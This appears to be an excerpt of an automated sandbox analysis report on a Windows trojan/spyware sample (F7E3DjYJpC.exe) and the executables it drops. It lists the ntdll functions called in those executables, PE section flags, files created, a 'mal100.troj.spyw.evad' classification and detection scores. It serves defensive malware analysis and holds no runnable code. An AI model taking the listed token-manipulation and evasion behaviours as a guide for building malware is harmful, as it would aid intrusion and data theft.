Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABF193B ZwRaiseException,ZwTerminateProcess, 20_2_6ABF193B
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABAA130 ZwCreateWaitCompletionPacket, 20_2_6ABAA130
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB84120 RtlAllocateHeap,memmove,memmove,RtlPrefixUnicodeString,RtlAllocateHeap,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,RtlFreeHeap, 20_2_6AB84120
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA9920 ZwDuplicateToken, 20_2_6ABA9920
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC38966 RtlGetCurrentServiceSessionId,ZwTraceEvent, 20_2_6AC38966
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA9910 ZwAdjustPrivilegesToken, 20_2_6ABA9910
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB69100 TpReleasePool,RtlAcquireSRWLockExclusive,ZwShutdownWorkerFactory,RtlGetCurrentServiceSessionId,TpReleasePool,TpReleasePool,RtlDebugPrintTimes,TpReleasePool, 20_2_6AB69100
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB70100 LdrUnloadAlternateResourceModuleEx,RtlAcquireSRWLockExclusive,ZwUnmapViewOfSection,ZwClose,LdrUnloadAlternateResourceModuleEx,RtlFreeHeap,RtlFreeHeap,RtlReAllocateHeap, 20_2_6AB70100
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA9900 ZwOpenEvent, 20_2_6ABA9900
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB6B171 ZwQueryDebugFilterState,_alloca_probe_16,memcpy,_vsnprintf,ZwWow64DebuggerCall,RtlRaiseException, 20_2_6AB6B171
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABF1976 ZwCreateEvent, 20_2_6ABF1976
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABE3971 ZwOpenKeyEx, 20_2_6ABE3971
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABAB160 ZwUpdateWnfStateData, 20_2_6ABAB160
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABAA160 ZwCreateWorkerFactory, 20_2_6ABAA160
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB6395E RtlAcquireSRWLockShared,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockShared,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockShared,RtlReleaseSRWLockExclusive,RtlFreeHeap,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,ZwGetCompleteWnfStateSubscription,RtlFreeHeap, 20_2_6AB6395E
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABAB150 ZwUnsubscribeWnfStateChange, 20_2_6ABAB150
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC3F13B ZwOpenKey,ZwCreateKey, 20_2_6AC3F13B
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB8B944 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,RtlGetCurrentServiceSessionId,ZwSetTimer2,RtlGetCurrentServiceSessionId,ZwCancelTimer2, 20_2_6AB8B944
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB8E6B0 RtlSetThreadWorkOnBehalfTicket,memcmp,ZwSetInformationThread,RtlSetThreadWorkOnBehalfTicket, 20_2_6AB8E6B0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC38ED6 RtlGetCurrentServiceSessionId,ZwTraceEvent, 20_2_6AC38ED6
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA9EA0 ZwCompareSigningLevels, 20_2_6ABA9EA0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABF2EA3 RtlGetCurrentServiceSessionId,ZwTraceEvent, 20_2_6ABF2EA3
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB9DE9E RtlAcquireSRWLockExclusive,RtlAcquireSRWLockExclusive,RtlGetCurrentServiceSessionId,ZwUnsubscribeWnfStateChange,RtlReleaseSRWLockExclusive,RtlFreeHeap,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlFreeHeap, 20_2_6AB9DE9E
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB62E9F ZwCreateEvent,ZwClose, 20_2_6AB62E9F
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABAA690 ZwOpenKeyEx, 20_2_6ABAA690
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB63E80 RtlSetThreadSubProcessTag,RtlGetCurrentServiceSessionId,RtlSetThreadSubProcessTag,RtlGetCurrentServiceSessionId,ZwTraceEvent, 20_2_6AB63E80
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB8E6F9 ZwAlpcSetInformation, 20_2_6AB8E6F9
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABF16FA ZwQueryWnfStateNameInformation,ZwUpdateWnfStateData,EtwEventWriteNoRegistration, 20_2_6ABF16FA
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB6B6F0 EtwEventWriteNoRegistration,ZwTraceEvent,RtlNtStatusToDosError, 20_2_6AB6B6F0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABBDEF0 RtlRaiseException,RtlCaptureContext,ZwRaiseException,RtlRaiseStatus, 20_2_6ABBDEF0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA96E0 ZwFreeVirtualMemory, 20_2_6ABA96E0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC1BE9B RtlAcquireSRWLockExclusive,ZwAllocateVirtualMemory,RtlReleaseSRWLockExclusive, 20_2_6AC1BE9B
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABEA6DE ZwRaiseHardError, 20_2_6ABEA6DE
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB666D4 RtlInitUnicodeString,ZwQueryValueKey, 20_2_6AB666D4
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB99ED0 RtlReleaseSRWLockExclusive,RtlReleaseSRWLockShared,RtlAcquireSRWLockExclusive,RtlAcquireSRWLockShared,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockShared,ZwWaitForAlertByThreadId, 20_2_6AB99ED0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA96D0 ZwCreateKey, 20_2_6ABA96D0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB62ED8 ZwWaitForAlertByThreadId,ZwWaitForAlertByThreadId, 20_2_6AB62ED8
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA96C0 ZwSetInformationProcess, 20_2_6ABA96C0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC33EBC ZwTraceControl,RtlNtStatusToDosError,RtlSetLastWin32Error, 20_2_6AC33EBC
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB6B630 ZwWaitForKeyedEvent, 20_2_6AB6B630
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA9E30 ZwCancelWaitCompletionPacket, 20_2_6ABA9E30
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA9E20 ZwCancelTimer2, 20_2_6ABA9E20
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA2E1C RtlInitializeCriticalSectionEx,ZwDelayExecution, 20_2_6ABA2E1C
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABF2E14 RtlGetCurrentServiceSessionId,ZwTraceEvent, 20_2_6ABF2E14
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB6C600 LdrQueryImageFileKeyOption,RtlInitUnicodeStringEx,ZwQueryValueKey,LdrQueryImageFileKeyOption,RtlFreeHeap,RtlAllocateHeap,ZwQueryValueKey,RtlFreeHeap,RtlUnicodeStringToInteger,memcpy, 20_2_6AB6C600
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABAAE70 ZwSetInformationWorkerFactory, 20_2_6ABAAE70
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA9670 ZwQueryInformationProcess, 20_2_6ABA9670
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB9BE62 ZwProtectVirtualMemory,RtlGetCurrentTransaction,RtlGetCurrentTransaction, 20_2_6AB9BE62
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC33E22 ZwTraceControl,RtlNtStatusToDosError,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlSetLastWin32Error, 20_2_6AC33E22
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABAB650 RtlUnhandledExceptionFilter,ZwTerminateProcess, 20_2_6ABAB650
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA9650 ZwQueryValueKey, 20_2_6ABA9650
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABAB640 RtlUnhandledExceptionFilter,ZwTerminateProcess, 20_2_6ABAB640
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC1FE3F memset,RtlGetCurrentServiceSessionId,ZwTraceEvent, 20_2_6AC1FE3F
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB6A7B0 RtlImpersonateSelfEx,ZwOpenProcessTokenEx,ZwDuplicateToken,ZwSetInformationThread,ZwClose,ZwClose,RtlImpersonateSelfEx, 20_2_6AB6A7B0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABEA7AC ZwCompareSigningLevels,ZwCompareSigningLevels, 20_2_6ABEA7AC
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA3FA0 RtlGetLocaleFileMappingAddress,ZwInitializeNlsFiles,RtlGetLocaleFileMappingAddress,ZwUnmapViewOfSection, 20_2_6ABA3FA0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA97A0 ZwUnmapViewOfSection, 20_2_6ABA97A0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC15F87 ZwUnmapViewOfSection, 20_2_6AC15F87
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA97F0 ZwOpenThreadTokenEx, 20_2_6ABA97F0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB70FFD RtlInitUnicodeString,ZwQueryValueKey, 20_2_6AB70FFD
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB937EB RtlImageNtHeader,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,ZwCreateIoCompletion,ZwCreateWorkerFactory,RtlAcquireSRWLockExclusive,RtlGetCurrentServiceSessionId,ZwSetInformationWorkerFactory, 20_2_6AB937EB
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABF0FEC ZwDuplicateObject,ZwDuplicateObject, 20_2_6ABF0FEC
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB9DFDF RtlWakeAddressAllNoFence,ZwAlertThreadByThreadId,RtlWakeAddressAllNoFence, 20_2_6AB9DFDF
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABAAFD0 ZwShutdownWorkerFactory, 20_2_6ABAAFD0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABFE7D3 ZwOpenThreadTokenEx,ZwOpenThreadTokenEx, 20_2_6ABFE7D3
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB6F7C0 EtwNotificationUnregister,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,ZwClose,RtlReleaseSRWLockExclusive,RtlSetLastWin32Error,EtwNotificationUnregister, 20_2_6AB6F7C0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA97C0 ZwTerminateProcess, 20_2_6ABA97C0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB9E730 RtlDecodePointer,ZwQueryInformationProcess,RtlRaiseStatus,RtlAllocateAndInitializeSid,RtlAllocateHeap,RtlAllocateAndInitializeSid,RtlAllocateAndInitializeSid,RtlAllocateAndInitializeSid, 20_2_6AB9E730
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA9730 ZwQueryVirtualMemory, 20_2_6ABA9730
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC38F6A RtlGetCurrentServiceSessionId,ZwTraceEvent, 20_2_6AC38F6A
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA9710 ZwQueryInformationToken, 20_2_6ABA9710
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC1CF70 RtlpGetUserOrMachineUILanguage4NLS,RtlInitUnicodeString,RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,ZwClose,RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,ZwClose,ZwClose, 20_2_6AC1CF70
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB99702 RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,ZwReleaseWorkerFactoryWorker, 20_2_6AB99702
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA9F70 ZwCreateIoCompletion, 20_2_6ABA9F70
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA9770 ZwSetInformationFile, 20_2_6ABA9770
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABF176C ZwOpenEvent,ZwWaitForSingleObject,ZwClose, 20_2_6ABF176C
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABAAF60 ZwSetTimer2, 20_2_6ABAAF60
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA9750 ZwQueryInformationThread, 20_2_6ABA9750
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC1CF30 ZwAlertThreadByThreadId, 20_2_6AC1CF30
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB9174B ZwFreeVirtualMemory,RtlFlushSecureMemoryCache,ZwFreeVirtualMemory, 20_2_6AB9174B
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA0F48 ZwOpenKey,ZwClose,ZwClose,ZwCreateKey,RtlInitUnicodeStringEx,ZwSetValueKey,RtlInitUnicodeStringEx,ZwSetValueKey,ZwClose, 20_2_6ABA0F48
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABEA746 ZwGetCachedSigningLevel,ZwCompareSigningLevels,ZwSetCachedSigningLevel, 20_2_6ABEA746
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA9740 ZwOpenThreadToken, 20_2_6ABA9740
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC38CD6 RtlGetCurrentServiceSessionId,ZwTraceEvent, 20_2_6AC38CD6
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA0CA1 ZwQuerySecurityAttributesToken,ZwQuerySecurityAttributesToken,ZwQuerySecurityAttributesToken, 20_2_6ABA0CA1
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABE3C93 wcschr,RtlInitUnicodeString,wcstoul,RtlAnsiStringToUnicodeString,RtlCompareUnicodeString,ZwProtectVirtualMemory,DbgPrintEx,RtlFreeUnicodeString, 20_2_6ABE3C93
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC214FB memset,RtlGetCurrentServiceSessionId,ZwTraceEvent, 20_2_6AC214FB
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABAA480 ZwInitializeNlsFiles, 20_2_6ABAA480
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC164FB ZwOpenKey,ZwQueryValueKey,RtlEqualUnicodeString,RtlEqualUnicodeString,RtlEqualUnicodeString,ZwClose, 20_2_6AC164FB
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC24496 ZwAllocateVirtualMemory,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint, 20_2_6AC24496
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB6F4E3 RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwSetEvent, 20_2_6AB6F4E3
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABF1CE4 ZwQueryInformationProcess, 20_2_6ABF1CE4
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC34CAB ZwTraceControl, 20_2_6AC34CAB
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB62CDB RtlFreeHeap,ZwClose,ZwSetEvent, 20_2_6AB62CDB
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC39CB3 RtlGetCurrentServiceSessionId,ZwTraceEvent, 20_2_6AC39CB3
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB8FC39 ZwAssociateWaitCompletionPacket, 20_2_6AB8FC39
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABAA420 ZwGetNlsSectionPtr, 20_2_6ABAA420
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC13C60 RtlFlushSecureMemoryCache,ZwQueryVirtualMemory, 20_2_6AC13C60
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA0413 ZwUnmapViewOfSection, 20_2_6ABA0413
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC38C75 RtlGetCurrentServiceSessionId,ZwTraceEvent, 20_2_6AC38C75
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB9AC7B ZwFreeVirtualMemory,RtlFillMemoryUlong,RtlFlushSecureMemoryCache,ZwFreeVirtualMemory,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,DbgPrint,DbgPrint,DbgPrint, 20_2_6AB9AC7B
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABF1C76 ZwQueryInformationProcess, 20_2_6ABF1C76
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA9C70 ZwAlpcConnectPort, 20_2_6ABA9C70
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA5C70 TpSetPoolMaxThreadsSoftLimit,ZwSetInformationWorkerFactory, 20_2_6ABA5C70
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC21411 ZwTraceEvent, 20_2_6AC21411
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB8746D RtlLeaveCriticalSection,ZwClose,RtlFreeHeap, 20_2_6AB8746D
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC38C14 RtlGetCurrentServiceSessionId,ZwTraceEvent, 20_2_6AC38C14
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB65450 RtlClearThreadWorkOnBehalfTicket,memcmp,RtlClearThreadWorkOnBehalfTicket,ZwSetInformationThread, 20_2_6AB65450
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABFC450 RtlReleasePrivilege,ZwAdjustPrivilegesToken,ZwSetInformationThread,ZwClose,RtlFreeHeap,ZwClose,RtlFreeHeap, 20_2_6ABFC450
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABF1C49 ZwQueryInformationProcess, 20_2_6ABF1C49
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA9C40 ZwAllocateVirtualMemoryEx, 20_2_6ABA9C40
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA95B0 ZwSetInformationThread, 20_2_6ABA95B0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA9DB0 ZwAlpcSetInformation, 20_2_6ABA9DB0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB665A0 RtlpGetDeviceFamilyInfoEnum,RtlInitUnicodeString,ZwQueryLicenseValue,RtlInitUnicodeString,ZwOpenKey,ZwClose,RtlGetDeviceFamilyInfoEnum,RtlInitUnicodeString,ZwOpenKey,ZwClose,RtlGetVersion, 20_2_6AB665A0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA9DA0 ZwAlpcSendWaitReceivePort, 20_2_6ABA9DA0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB63591 ZwSetInformationFile, 20_2_6AB63591
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB7DD80 RtlAcquireSRWLockShared,ZwQueryVirtualMemory,RtlImageNtHeaderEx,RtlImageNtHeaderEx,RtlImageNtHeaderEx,RtlRaiseStatus,RtlAddressInSectionTable,RtlImageDirectoryEntryToData, 20_2_6AB7DD80
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC1BDFA RtlAcquireSRWLockExclusive,ZwAllocateVirtualMemory,RtlReleaseSRWLockExclusive, 20_2_6AC1BDFA
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC21582 ZwTraceEvent, 20_2_6AC21582
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB695F0 TpSetPoolMinThreads,ZwSetInformationWorkerFactory,RtlGetCurrentServiceSessionId,TpSetPoolMinThreads, 20_2_6AB695F0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA95F0 ZwQueryInformationFile, 20_2_6ABA95F0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA9DE0 ZwAssociateWaitCompletionPacket, 20_2_6ABA9DE0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB645D0 RtlGetThreadWorkOnBehalfTicket,RtlGetThreadWorkOnBehalfTicket,ZwQueryInformationThread, 20_2_6AB645D0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA95D0 ZwClose, 20_2_6ABA95D0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB64DC0 RtlpUnWaitCriticalSection,RtlWakeAddressAllNoFence,RtlRaiseStatus,TpWaitForAlpcCompletion,RtlpUnWaitCriticalSection,ZwSetEvent,TpWaitForAlpcCompletion,ZwAlpcQueryInformation, 20_2_6AB64DC0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA95C0 ZwSetEvent, 20_2_6ABA95C0
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB8EDC4 ZwCancelWaitCompletionPacket, 20_2_6AB8EDC4
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB94D3B memset,RtlRunOnceExecuteOnce,ZwTraceControl,memcmp,RtlNtStatusToDosError,RtlFreeHeap,RtlAllocateHeap,RtlNtStatusToDosError,RtlFreeHeap, 20_2_6AB94D3B
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB91520 RtlInitializeCriticalSectionEx,RtlInitializeCriticalSectionEx,RtlGetCurrentServiceSessionId,ZwTraceEvent, 20_2_6AB91520
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA9520 ZwWaitForSingleObject, 20_2_6ABA9520
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC26D61 ZwAllocateVirtualMemoryEx, 20_2_6AC26D61
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABAAD10 ZwSetCachedSigningLevel, 20_2_6ABAAD10
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABF1D0B ZwSetInformationProcess, 20_2_6ABF1D0B
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABA9D70 ZwAlpcQueryInformation, 20_2_6ABA9D70
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABF1570 ZwQuerySystemInformation,RtlInitUnicodeString,memset,ZwAlpcConnectPort,ZwAlpcSendWaitReceivePort,ZwClose, 20_2_6ABF1570
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABF1D6A ZwWaitForMultipleObjects, 20_2_6ABF1D6A
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC1FD22 ZwQueryInformationProcess,RtlUniform, 20_2_6AC1FD22
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB90548 RtlEnterCriticalSection,RtlLeaveCriticalSection,RtlRbInsertNodeEx,ZwQueryVirtualMemory, 20_2_6AB90548
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AC38D34 RtlGetCurrentServiceSessionId,ZwTraceEvent, 20_2_6AC38D34
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABF1D43 ZwQueryInformationThread, 20_2_6ABF1D43
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6ABE3540 LdrAppxHandleIntegrityFailure,RtlQueryPackageIdentityEx,memset,ZwQueryValueKey,RtlFreeHeap,ZwClose,memset,memset,RtlCaptureContext,RtlReportException,ZwTerminateProcess, 20_2_6ABE3540
Source: C:\Users\user\AppData\Local\Temp\31F4.exe Code function: 22_2_022E48D8 NtAllocateVirtualMemory, 22_2_022E48D8
Source: C:\Users\user\AppData\Local\Temp\31F4.exe Code function: 22_2_022E48D0 NtAllocateVirtualMemory, 22_2_022E48D0
Source: 1254.exe.6.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 39A7.exe.6.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 5483.exe.6.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 20BD.exe.6.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 69B.exe.6.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 9415.exe.6.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 16BC.exe.6.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 3D90.exe.6.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: ssbavbe.6.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: F7E3DjYJpC.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\iwbavbe Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@51/35@62/9
Source: C:\Users\user\AppData\Local\Temp\69B.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe Code function: 25_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle, 25_2_00401306
Source: F7E3DjYJpC.exe Joe Sandbox Cloud Basic: Detection: clean Score: 0 Perma Link
Source: C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe Code function: 25_2_0040A33B FindResourceW,SizeofResource,LoadResource,LockResource, 25_2_0040A33B
Source: F7E3DjYJpC.exe Virustotal: Detection: 28%
